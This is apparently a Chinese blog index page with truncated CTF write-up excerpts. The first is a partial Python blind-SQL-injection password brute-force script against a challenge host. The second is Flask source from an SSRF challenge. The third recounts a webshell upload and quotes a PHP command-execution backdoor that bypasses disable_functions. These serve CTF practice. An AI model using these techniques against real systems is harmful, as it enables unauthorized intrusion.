刷题
完成事项 刷题 未完成的事项 暂时没有 下周待做的事 刷题 本周知识分享[NISACTF 2022]hardsql有点意思的一题 首先更具题目的提示得知这用户名为bilala,而且passwd处是爆破点,那么构造脚本爆破密码 123456789101112131415import requestsurl='http://node5.anna.nssctf.cn:20055/login.php'str= '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'flag=''for i in range(62): for j in str: data= { ...
web-刷题-枫何
完成事项 刷题 搭建博客 未完成的事项 暂时没有 下周待做的事 刷题 本周知识分享[CISCN 2019华东南]Web4url暴露了是ssrf 也确实是 响应头回显python,那么唯一能说的通的就是这题考点是flask 事实也确实如此 得到源码 12345678910111213141516171819202122232425262728293031323334353637383940# encoding:utf-8import reimport randomimport uuidimport urllibfrom flask import Flask, session, requestapp = Flask(__name__)random.seed(uuid.getnode())app.config['SECRET_KEY'] = str(random.random() * 233)app.debug = True@app.route('/')def index(): ...
ciscn刷题
去你的,半天没找到注入点 进入主页后会发现有一个admin登录点 接下来直接一个弱口令爆破,然会就进后台了,upload直接打上去 也是顺利拿到shell了 但是发现这个shell似乎没什么用,更目录也没flag 那就先扫一下源码看看有没有什么漏洞,找到一个后门,那么我们看看源码 12345678910111213141516171819<?php echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>"; $cmd = $_GET["cmd"]; $out_path = $_GET["outpath"]; $evil_cmdline = $cmd . " > " ....
Hello,该网站还在开发中,请稍安勿躁
与你的日常,就是奇迹 Ciallo~(∠・ω< )⌒★